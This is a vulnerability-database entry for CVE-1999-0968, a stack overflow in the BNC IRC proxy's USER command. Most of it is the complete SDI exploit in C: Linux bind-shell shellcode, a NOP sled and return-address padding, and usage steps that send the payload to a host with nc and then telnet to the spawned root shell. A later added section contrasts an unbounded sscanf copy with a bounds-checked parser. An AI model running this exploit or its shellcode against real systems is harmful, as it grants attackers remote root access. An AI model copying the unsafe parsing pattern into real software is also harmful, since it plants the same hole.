BNC IRC Port Buffer Overflow Vulnerability

Vulnerability ID: 1105390
Vulnerability type: Buffer overflow
Published: 1998-12-26
Updated: 2005-05-02
CVE ID: CVE-1999-0968
CNNVD ID: CNNVD-199812-020
Platform: Unix
CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/20395
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199812-020
|Vulnerability details
The BNC IRC proxy contains a stack-based buffer overflow in its handling of the IRC USER command: the username argument is copied into a fixed-size buffer without a length check, so a remote attacker who connects to the proxy port can overwrite the saved return address and execute arbitrary code. If properly exploited, this yields root privileges on the host running the proxy.
|Vulnerability EXP
/*
source: http://www.securityfocus.com/bid/1927/info

BNC's IRC Proxy is used as a gateway to an IRC server.

A buffer stores the username that is the argument to the program's USER command. User-supplied input to this buffer is not properly checked for length.

As a result, the excessive data copied onto the stack can overwrite critical parts of the stack frame such as the calling function's return address. Since this data is supplied by the user it can be crafted to alter the program's flow of execution.

If properly exploited, this can yield root privilege to the attacker.
*/


/*
* SDI irc bouncer exploit
*
* This source exploits a buffer overflow in the bnc,
* popular irc bouncer, binding a shell.
*
* Tested against bnc 2.2.4 running on linux.
*
* usage:
* lame:~# gcc SDI-bnc.c -o SDI-bnc
*
* lame:~# (SDI-bnc 0; cat) | nc www.lame.org 666
* `-> offset, zero in most cases
*
* lame:~# telnet www.lame.org 10752
*
*
* by jamez and dumped from sekure SDI (www.sekure.org)
*
* email: [email protected]
*
* merry christmas and happy 1999 ;)
*
*/

/* c0nd0r :* */
/* Linux/x86 bind-shell payload: fork, socket/bind/listen/accept via
 * socketcall (0x66), dup2 (0x3f) the accepted client onto fds 0-2, then
 * execve (0x0b) "/bin/sh". The port word stored into the sockaddr is 0x2a00,
 * i.e. TCP 10752 in network byte order, matching the telnet step above.
 * (Backslashes in the escapes were lost in extraction and are restored.) */
char bindcode[] =
"\x33\xDB\x33\xC0\xB0\x1B\xCD\x80\x33\xD2\x33\xc0\x8b\xDA\xb0\x06"
"\xcd\x80\xfe\xc2\x75\xf4\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x62"
"\xeb\x62\x5e\x56\xac\x3c\xfd\x74\x06\xfe\xc0\x74\x0b\xeb\xf5\xb0"
"\x30\xfe\xc8\x88\x46\xff\xeb\xec\x5e\xb0\x02\x89\x06\xfe\xc8\x89"
"\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\x31\xdb\xfe\xc3\x89\xf1\xcd"
"\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x2a\x66\x89\x46\x0e\x8d"
"\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0"
"\x66\xfe\xc3\xcd\x80\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\xeb\x04"
"\xeb\x4c\xeb\x52\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xfe\xc3\xcd\x80"
"\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xfe\xc1\xcd\x80\xb0\x3f\xfe\xc1"
"\xcd\x80\xb8\x2e\x62\x69\x6e\x40\x89\x06\xb8\x2e\x73\x68\x21\x40\x89\x46"
"\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e"
"\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x45\xff\xff"
"\xff\xFF\xFD\xFF\x50\x72\x69\x76\x65\x74\x20\x41\x44\x4D\x63\x72\x65\x77";

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SIZE 1600
#define NOP 0x90

char buffer[SIZE];

int main(int argc, char *argv[])
{
    int i, x, offset = 0;
    long addr;

    /* optional adjustment to the guessed stack address; zero in most cases */
    if (argc > 1) offset = atoi(argv[1]);

    addr = 0xbffff6ff + offset; /* evil addr: where the NOP sled is expected on the stack */

    /* first third of the payload is a NOP sled */
    for (i = 0; i < SIZE/3; i++)
        buffer[i] = NOP;

    /* followed by the bind-shell code */
    for (x = 0; x < strlen(bindcode); i++, x++)
        buffer[i] = bindcode[x];

    /* the remainder is the return address repeated little-endian, so that
     * whichever four bytes land on the saved EIP point back into the sled
     * (bound is i + 3 < SIZE so the last word cannot run past buffer[]) */
    for (; i + 3 < SIZE; i += 4)
    {
        buffer[i ]  = addr & 0x000000ff;
        buffer[i+1] = (addr & 0x0000ff00) >> 8;
        buffer[i+2] = (addr & 0x00ff0000) >> 16;
        buffer[i+3] = (addr & 0xff000000) >> 24;
    }

    buffer[SIZE - 1] = 0;

    /* emit the oversized USER line; pipe it into nc as shown in the usage above */
    printf("USER %s\n", buffer);

    return 0;
}
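The BID text above describes the bug as an unchecked copy of the USER argument into a fixed stack buffer, and the exploit fills that argument with a NOP sled, shellcode and a repeated return address. The C below is an added example, not BNC's source and not part of the original exploit: it puts the vulnerable pattern in miniature (an sscanf "%s" conversion into a fixed 32-byte buffer with no width limit) next to a hardened parser that measures the argument first and rejects anything that will not fit, then feeds the hardened parser a constructed 1598-byte line shaped like the exploit's payload (NOP sled plus 0xbffff6ff repeated little-endian, shellcode omitted). USERNAME_MAX, the function names and the sscanf-based parsing are assumptions for illustration, not BNC's real buffer size or code.

```c
/* Added example: the unchecked-copy pattern described in the advisory next
 * to a bounds-checked parser. Not BNC's source; USERNAME_MAX, the function
 * names and the sscanf-based parsing are assumptions for illustration. */
#include <stdio.h>
#include <string.h>

#define USERNAME_MAX 32   /* assumed fixed buffer size, not BNC's real one */

/* Vulnerable pattern: the USER argument lands in a fixed stack buffer via
 * an unbounded "%s" conversion. Anything longer than USERNAME_MAX - 1 bytes
 * overruns name[] and, as the advisory says, reaches the saved return
 * address. Kept here only for contrast; call it with short input only. */
static int user_cmd_unsafe(const char *line, char *out, size_t outlen)
{
    char name[USERNAME_MAX];

    if (sscanf(line, "USER %s", name) != 1)     /* no width limit: overflow */
        return -1;
    snprintf(out, outlen, "%s", name);
    return (int)strlen(out);
}

/* Hardened: measure the argument before copying and reject, rather than
 * truncate, when it will not fit. Returns the username length or -1. */
static int user_cmd_safe(const char *line, char *out, size_t outlen)
{
    const char *arg;
    size_t len;

    if (strncmp(line, "USER ", 5) != 0)
        return -1;
    arg = line + 5;
    len = strcspn(arg, " \r\n");        /* argument ends at space or EOL */
    if (len == 0 || len >= outlen)      /* empty, or too long for out[] */
        return -1;
    memcpy(out, arg, len);
    out[len] = '\0';
    return (int)len;
}

/* Constructed sample input shaped like the exploit's line: "USER ", a NOP
 * sled, then 0xbffff6ff repeated little-endian up to the newline. The
 * shellcode is left out; the length alone is what the parser must catch.
 * Returns the line length (1598 for a 1600-byte buffer). */
static size_t build_overflow_line(char *buf, size_t bufsz)
{
    static const unsigned char addr[4] = { 0xff, 0xf6, 0xff, 0xbf };
    size_t n, sled = 600;

    if (bufsz < 5 + sled + 4 + 2)
        return 0;
    memcpy(buf, "USER ", 5);
    n = 5;
    memset(buf + n, 0x90, sled);
    n += sled;
    while (n + 4 <= bufsz - 2) {        /* leave room for '\n' and NUL */
        memcpy(buf + n, addr, 4);
        n += 4;
    }
    buf[n++] = '\n';
    buf[n] = '\0';
    return n;
}

int main(void)
{
    char out[USERNAME_MAX];
    char line[1600];
    int rc;

    rc = user_cmd_safe("USER jamez\r\n", out, sizeof out);
    printf("benign line, safe parser   -> %d (%s)\n", rc, out);
    rc = user_cmd_unsafe("USER jamez\r\n", out, sizeof out);
    printf("benign line, unsafe parser -> %d (%s)\n", rc, out);
    build_overflow_line(line, sizeof line);
    rc = user_cmd_safe(line, out, sizeof out);
    printf("exploit-shaped line, safe parser -> %d (rejected before any copy)\n", rc);
    /* user_cmd_unsafe(line, ...) is deliberately not called: it would
     * overflow name[] exactly as the vulnerable proxy does. */
    return 0;
}
```

Rejecting instead of truncating is the point: a truncating copy would still accept the 1592-byte argument as a 31-byte username and let the session continue, while the check above fails the command before any byte is written, which is also the condition a proxy-side or IDS filter would key on (an IRC USER argument far longer than any legitimate ident).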
|References

Source: XF
Name: bnc-proxy-bo(1546)
Link: http://xforce.iss.net/static/1546.php

Source: BID
Name: 1927
Link: http://www.securityfocus.com/bid/1927

Source: BUGTRAQ
Name: 19981226 bnc exploit
Link: http://www.securityfocus.com/archive/1/11711
